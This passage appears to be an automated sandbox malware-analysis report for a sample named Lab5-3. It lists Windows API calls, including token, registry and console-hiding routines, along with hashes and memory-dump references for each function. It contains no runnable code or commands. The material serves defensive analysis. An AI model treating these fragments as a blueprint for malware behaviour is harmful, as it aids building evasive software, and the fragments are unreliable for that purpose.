                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MountPointVolumewsprintf
                                                                                                            • String ID: %$:$bc's$h'"T
                                                                                                            • API String ID: 3917388826-2706984278
                                                                                                            • Opcode ID: 282d696d7c9e156d7f624f1968b9dd1de267ca8691ffc9685b725376c640da43
                                                                                                            • Instruction ID: fc79a7628354a4e4e24bcdf9ce54d88c51d374d2ee8d1438f9f48510c387277e
                                                                                                            • Opcode Fuzzy Hash: 282d696d7c9e156d7f624f1968b9dd1de267ca8691ffc9685b725376c640da43
                                                                                                            • Instruction Fuzzy Hash: 5B217C71D04248AACB11CBE5DC49ADFBFFCEF19354F44816AD804E3280E7789649CBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000,?), ref: 00411D03
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00411D0A
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00411D2A
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00411D3E
                                                                                                            • RegCreateKeyExA.ADVAPI32(-80000003,00000000,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00411D66
                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000002,00000000,00000001,?,?,?,?), ref: 00411DC9
                                                                                                            • lstrcmpiW.KERNEL32(?,?,?,?), ref: 00411DDB
                                                                                                            • RegSetValueExW.ADVAPI32(?,00000002,00000000,00000001,?,?,?,?), ref: 00411E17
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00411E25
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseProcessTokenValue$CreateCurrentHandleInformationOpenQuerylstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 763719182-0
                                                                                                            • Opcode ID: 7eb0e3e86d36650d25eef94fb3c34d815d80d1b528fe464c51c596deff790fb2
                                                                                                            • Instruction ID: 3f204fe39781c4767e73356e597d39d3cafadb42b9e6192bcc11691f83097163
                                                                                                            • Opcode Fuzzy Hash: 7eb0e3e86d36650d25eef94fb3c34d815d80d1b528fe464c51c596deff790fb2
                                                                                                            • Instruction Fuzzy Hash: DA518271A0021AABDB10DFA5DC49FFFBBB8EF08355F054166E904B7260E7749A44CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F9EF
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040F9F6
                                                                                                            • GetConsoleWindow.KERNEL32(00000000), ref: 0040FA27
                                                                                                            • Sleep.KERNEL32(0001869F), ref: 0040FA35
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressConsoleHandleModuleProcSleepWindow
                                                                                                            • String ID: DU$QC_^$sBUQ
                                                                                                            • API String ID: 2646531005-3283677093
                                                                                                            • Opcode ID: f3a8c72c7a7e2062f69223916427cd69b41e3f6efd52e089529de98fe323ce14
                                                                                                            • Instruction ID: 8b7003d262a026946be78bd93eb04975eafada67a82ea5c44a84909ff590e3f0
                                                                                                            • Opcode Fuzzy Hash: f3a8c72c7a7e2062f69223916427cd69b41e3f6efd52e089529de98fe323ce14
                                                                                                            • Instruction Fuzzy Hash: 5E21F531D04288ABDB119BB8A4487DFFFA59F2D341F0580FAE854AB241D6310644CBE9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041917C
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041919B
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419211
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419230
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419279
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419298
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004192C9
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004192E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 885266447-0
                                                                                                            • Opcode ID: e79bc008e8088261fc92d9314e2ac1c6a5de38626e2c51ad0f8844eb49edcd52
                                                                                                            • Instruction ID: d7e52921a801810b29cc790a1d76ec9264f07b3f35ebdb81614f55defc82449b
                                                                                                            • Opcode Fuzzy Hash: e79bc008e8088261fc92d9314e2ac1c6a5de38626e2c51ad0f8844eb49edcd52
                                                                                                            • Instruction Fuzzy Hash: 6051EC72B001146BEB149E2DCD90B9EB796EF85710F1982BBED14EB3C4D239DC404799
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,?,0000082C,00000000,?,000007C8), ref: 0040BA25
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,?,0000082C,00000000,?,000007C8), ref: 0040BA42
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,?,0000082C,00000000,?,000007C8), ref: 0040BA5F
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,?,0000082C,00000000,?,000007C8), ref: 0040BA7C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1294909896-0
                                                                                                            • Opcode ID: a49bd434e42155f21e2a95743630ea19f409d5b0c17d62fc7b14633767c243ae
                                                                                                            • Instruction ID: 5b0149b7bfd63fee4ca4a5e410b928f2a4a60318d329b64d7720754f9b44ab75
                                                                                                            • Opcode Fuzzy Hash: a49bd434e42155f21e2a95743630ea19f409d5b0c17d62fc7b14633767c243ae
                                                                                                            • Instruction Fuzzy Hash: D7F1FAB2C002199BDB21DAA59C41BEF77BCAB44754F08013AED14B7281E77DAE4587E8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GdipCreateFontFamilyFromName.GDIPLUS(00411F66,00000000,?,00000000,0000000A), ref: 00401235
                                                                                                            • GdipGetGenericFontFamilySansSerif.GDIPLUS(0042840C), ref: 00401267
                                                                                                            • GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00401286
                                                                                                            • GdipCreateFont.GDIPLUS(00000000,?,00000003,00000003,?), ref: 004012AD
                                                                                                            • GdipGetGenericFontFamilySansSerif.GDIPLUS(0042840C,?,00000003,00000003,?), ref: 004012CF
                                                                                                            • GdipCreateFont.GDIPLUS(?,?,00000003,00000003,?,?,00000003,00000003,?), ref: 004012FB
                                                                                                            • GdipDeleteFontFamily.GDIPLUS(00000000,?,00000003,00000003,?), ref: 00401303
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FontGdip$Family$Create$DeleteGenericSansSerif$FromName
                                                                                                            • String ID:
                                                                                                            • API String ID: 2831291859-0
                                                                                                            • Opcode ID: c29700c167b35fe2613740b7fefed36274ea8ef3cbdc742ec9301415fed3456c
                                                                                                            • Instruction ID: d62b181d2a8f830cb4f77dd6fef2682e66a6f27958cf8952eab393085cc44b25
                                                                                                            • Opcode Fuzzy Hash: c29700c167b35fe2613740b7fefed36274ea8ef3cbdc742ec9301415fed3456c
                                                                                                            • Instruction Fuzzy Hash: B0316D74B02205ABD720DF69ED44B5EBBF8EF45700F50C1AEE805A72A1EB70D9018B98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 78a27edd9e4dc6c6f31b18c3d007708caa327c138bfdc5bb0b8c4998b64ffed9
                                                                                                            • Instruction ID: ec4c4120b6eb0a779cb780738938500450c85f9a331ead1921b4d311e952b877
                                                                                                            • Opcode Fuzzy Hash: 78a27edd9e4dc6c6f31b18c3d007708caa327c138bfdc5bb0b8c4998b64ffed9
                                                                                                            • Instruction Fuzzy Hash: B5025C72D402199BCB20DFE5DC85AAFB7B8AF54314F05017AEC04BB382E739AD158B95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EncodersGdipImageSizemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1854992867-0
                                                                                                            • Opcode ID: f6c60024073f4cb57e0f8f2bde4f8bba52051608b4d6e0bfcd50a0ce47c877b0
                                                                                                            • Instruction ID: 3e6433f94f1ed34bbcdba926ff14b45bf1ffff61e29cb2b3a4b9016ddf6f4980
                                                                                                            • Opcode Fuzzy Hash: f6c60024073f4cb57e0f8f2bde4f8bba52051608b4d6e0bfcd50a0ce47c877b0
                                                                                                            • Instruction Fuzzy Hash: 1421F671E001089BDB109F98DD455EFB779FF24325F1042A2EC19D7360E7769AA4C794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • calloc.MSVCRT ref: 00409B34
                                                                                                            • free.MSVCRT(0C458D36,0C458D36,75F6850C,00000000,0C458D36,75F6850C,00408710,?,?,?,?,?,?,?,0000082C,00000000), ref: 00409B70
                                                                                                            • calloc.MSVCRT ref: 00409C00
                                                                                                            • free.MSVCRT(FE811075,FE811075,8B5640EC,00000000,FE811075,8B5640EC,00408710,?,?,?,?,?,?,?,0000082C,00000000), ref: 00409C35
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: callocfree
                                                                                                            • String ID:
                                                                                                            • API String ID: 306872129-0
                                                                                                            • Opcode ID: afee85e1f141b2fd22fc6301b53b09c251f84538de5f76140d061b63aecbd21e
                                                                                                            • Instruction ID: 01c36718760dd56b792d81238327108a8745c82dc47bdabbc46a0d59caf1ca76
                                                                                                            • Opcode Fuzzy Hash: afee85e1f141b2fd22fc6301b53b09c251f84538de5f76140d061b63aecbd21e
                                                                                                            • Instruction Fuzzy Hash: F951A031A046159FDB20CF19C880A6AB3E5FF85324B44C53EE81AAB395D738FD41CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • calloc.MSVCRT ref: 0040BFEA
                                                                                                            • free.MSVCRT(?,?,?,00000000,?,?,00000000,-00000002), ref: 0040C02A
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,-00000002), ref: 0040C0B1
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,-00000002), ref: 0040C0CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: free$calloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3095843317-0
                                                                                                            • Opcode ID: 96b727e47ee82a5a7fa6b4febd205ae9bf27e21c4736b23211888e3ddc1ed0fb
                                                                                                            • Instruction ID: fccfa55ca9b783b55a79462ee8e33f13877072596b08b627f75ceb8fed52c50e
                                                                                                            • Opcode Fuzzy Hash: 96b727e47ee82a5a7fa6b4febd205ae9bf27e21c4736b23211888e3ddc1ed0fb
                                                                                                            • Instruction Fuzzy Hash: 7D516F7190021ADBDB20DF94C881AAFB7B8EF04314F14417AED14AB392D779EE45CB98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%